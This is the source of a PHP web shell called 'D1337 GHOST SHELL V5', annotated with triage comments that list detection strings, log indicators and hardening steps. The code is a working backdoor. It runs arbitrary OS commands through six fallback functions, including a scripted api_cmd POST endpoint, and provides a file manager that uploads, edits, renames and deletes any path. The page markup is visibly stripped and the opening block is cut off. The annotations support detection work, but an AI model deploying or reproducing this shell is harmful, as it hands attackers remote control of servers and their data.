'; echo ''; echo '
'; echo '

D1337 GHOST SHELL V5

'; echo '

'; echo '
'; echo ''; die(); }
// NOTE(review): the line above closes a block that begins before this listing;
// only echoed page text and the final die() are visible, so the condition that
// guards it cannot be confirmed from here.
//
// Triage summary: the code below is a PHP web shell. It combines a command
// runner (rce), a scripted command endpoint (POST api_cmd) and a file manager
// (browse, upload, delete, rename, edit), all driven directly by request
// parameters with no validation visible in this listing.
//
// Literal strings on this page that can be used for file-content and traffic
// matching: "D1337 GHOST SHELL V5", "D1337 V5", "D1337_RCE_START",
// "D1337_RCE_END", and the parameter names api_cmd, cmd, d, del, ren, edit,
// new_name, file_content plus the upload field f.
//
// Hardening that blunts what is shown here: a docroot the web-server account
// cannot write to, no PHP execution in upload-writable directories, a
// disable_functions list that covers every function rce() probes, and file
// integrity monitoring on the web tree.
//
// NOTE(review): several echo strings are empty or run words together
// ("NameSizePermsAction"), which suggests the HTML markup was stripped when
// the page was captured; the listing is probably not the file as deployed.

// Core Functions

/**
 * Run $cmd as an operating-system command and return what it printed.
 *
 * Probes system, exec, passthru, shell_exec, popen and proc_open in that
 * order and uses the first one function_exists() reports as available.
 * Because function_exists() reports false for functions removed through
 * disable_functions, blocking only some of the six leaves a working path;
 * the chain itself (six process-spawning functions tested back to back) is a
 * useful static-analysis signal.
 *
 * @param string $cmd Command line, handed unchanged to the chosen function.
 * @return mixed Captured output; "" when none of the six is available.
 */
function rce($cmd){
    $out = "";
    if(function_exists('system')){
        // system() prints directly, so its output is captured via a buffer.
        ob_start();
        system($cmd);
        $out = ob_get_contents();
        ob_end_clean();
    } elseif(function_exists('exec')){
        // exec() fills $o with one entry per output line.
        exec($cmd, $o);
        $out = implode("\n", $o);
    } elseif(function_exists('passthru')){
        ob_start();
        passthru($cmd);
        $out = ob_get_contents();
        ob_end_clean();
    } elseif(function_exists('shell_exec')){
        $out = shell_exec($cmd);
    } elseif(function_exists('popen')){
        // Read the child's stdout in 1024-byte chunks until EOF.
        $fp = popen($cmd, 'r');
        while(!feof($fp)) $out .= fread($fp, 1024);
        pclose($fp);
    } elseif(function_exists('proc_open')){
        // Three pipes are opened but only stdout (pipe 1) is read; anything
        // written to stderr is discarded.
        $d = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
        $p = proc_open($cmd, $d, $pipes);
        if(is_resource($p)){
            $out = stream_get_contents($pipes[1]);
            fclose($pipes[0]);
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($p);
        }
    }
    return $out;
}

// Direct RCE for scripts (Stateless)
// Any POST request carrying api_cmd has that value passed to rce() as-is. The
// raw, unescaped output is printed between the two marker lines and the script
// stops, so no page is rendered. The fixed markers can be matched in response
// bodies, and the api_cmd parameter name in request logging that records POST
// fields.
// NOTE(review): whether this is reachable without passing the gate that ends
// on the first line depends on the cut-off block; confirm against the full
// file.
if(isset($_POST['api_cmd'])) {
    echo "D1337_RCE_START\n";
    echo rce($_POST['api_cmd']);
    echo "\nD1337_RCE_END";
    die();
}

/**
 * Render the mode bits of $file as a 10-character ls-style string.
 *
 * The first character is the file type taken from the high bits of
 * fileperms(): 's' socket, 'l' symlink, '-' regular file, 'b' block device,
 * 'd' directory, 'c' character device, 'p' FIFO, 'u' for anything else.
 * The next nine are rwx triplets for owner, group and others, with
 * setuid (0x0800), setgid (0x0400) and sticky (0x0200) folded into the
 * execute position as s/S, s/S and t/T.
 *
 * @param string $file Path passed to fileperms().
 * @return string Permission string such as "-rw-r--r--".
 */
function get_perms($file){
    $p = fileperms($file);
    // File type: the masks are tested from the most specific downwards.
    if (($p & 0xC000) == 0xC000) $i = 's';
    elseif (($p & 0xA000) == 0xA000) $i = 'l';
    elseif (($p & 0x8000) == 0x8000) $i = '-';
    elseif (($p & 0x6000) == 0x6000) $i = 'b';
    elseif (($p & 0x4000) == 0x4000) $i = 'd';
    elseif (($p & 0x2000) == 0x2000) $i = 'c';
    elseif (($p & 0x1000) == 0x1000) $i = 'p';
    else $i = 'u';
    // Owner triplet; lowercase 's' means setuid with execute, 'S' without.
    $i .= (($p & 0x0100) ? 'r' : '-');
    $i .= (($p & 0x0080) ? 'w' : '-');
    $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
    // Group triplet; same scheme for setgid.
    $i .= (($p & 0x0020) ? 'r' : '-');
    $i .= (($p & 0x0010) ? 'w' : '-');
    $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
    // Others triplet; 't'/'T' mark the sticky bit.
    $i .= (($p & 0x0004) ? 'r' : '-');
    $i .= (($p & 0x0002) ? 'w' : '-');
    $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
    return $i;
}

// Working directory comes from the d query parameter, falling back to the
// script's current directory. Backslashes are normalised to forward slashes.
// No base-directory restriction is applied, so any directory the PHP process
// can enter is accepted.
$dir = isset($_GET['d']) ? $_GET['d'] : getcwd();
$dir = str_replace("\\", "/", $dir);
if(is_dir($dir)) chdir($dir);

// Actions
// Each action below acts on request-supplied paths with no confinement and no
// check visible in this listing. In access logs they appear as GET requests
// with del=, ren= or edit= and as POSTs with new_name or file_content; the
// upload arrives as multipart field f.
$msg = "";
// Upload: the file is stored under $dir using the client-supplied name.
if(isset($_FILES['f'])){
    if(move_uploaded_file($_FILES['f']['tmp_name'], $dir."/".$_FILES['f']['name'])) $msg = "Upload OK: ".$_FILES['f']['name'];
    else $msg = "Upload Failed!";
}
// Delete: rmdir() for directories, unlink() otherwise; the result of either
// call is not checked, so the message is set even if nothing was removed.
if(isset($_GET['del'])){
    $df = $_GET['del'];
    if(is_dir($df)) {
        rmdir($df);
        $msg = "Dir Deleted";
    } else {
        unlink($df);
        $msg = "File Deleted";
    }
}
// Rename: source path from the ren query parameter, target name from the
// new_name POST field, placed in $dir.
if(isset($_POST['new_name'])){
    rename($_GET['ren'], $dir."/".$_POST['new_name']);
    $msg = "Renamed!";
}
// Edit/save: overwrites (or creates) the path in the edit query parameter
// with the posted content.
if(isset($_POST['file_content']) && isset($_GET['edit'])){
    file_put_contents($_GET['edit'], $_POST['file_content']);
    $msg = "File Saved!";
}

// Page output starts here. "D1337 V5" is the only text left in the header
// strings of this listing.
echo "D1337 V5";
echo "";
echo "";
echo "";
echo "";
// Status line for the action handled above.
if($msg != "") echo "
[*] $msg
";
// Command Execution
// Interactive counterpart of the api_cmd endpoint: the cmd POST field is run
// through rce(). The command text is echoed back unescaped; only the command
// output goes through htmlspecialchars().
echo "";
if(isset($_POST['cmd'])){
    echo "
$ ".$_POST['cmd']."\n\n".htmlspecialchars(rce($_POST['cmd']))."
";
}
// Edit File
// The edit query parameter is interpolated into the page unescaped.
if(isset($_GET['edit'])){
    $f = $_GET['edit'];
    echo "

Edit: $f



[Cancel]
";
}
// Rename File
// Only the basename of the ren parameter is displayed here; the rename action
// above still uses the full value.
elseif(isset($_GET['ren'])){
    $f = basename($_GET['ren']);
    echo "

Rename: $f

[Cancel]
";
}
// Main View
// Directory listing of $dir: directories first (skipping "."), then regular
// files with size in KB and the get_perms() string.
else {
    echo "";
    $scandir = scandir($dir);
    echo "";
    // Directories first
    foreach($scandir as $file){
        if(!is_dir($dir."/".$file) || $file == ".") continue;
        $link = "?d=$dir/$file";
        $perm = get_perms($dir."/".$file);
        echo "";
    }
    // Files
    foreach($scandir as $file){
        if(!is_file($dir."/".$file)) continue;
        $size = round(filesize($dir."/".$file)/1024, 2)." KB";
        $perm = get_perms($dir."/".$file);
        echo "";
    }
    // NOTE(review): the text in the string below looks like the table header
    // and row cells that belonged inside the empty echo strings in the two
    // loops above, displaced when the markup was stripped.
    echo "
NameSizePermsAction
[DIR] $file-$permRename | Delete
$file$size$permEdit | Rename | Delete
";
}
echo "";
?>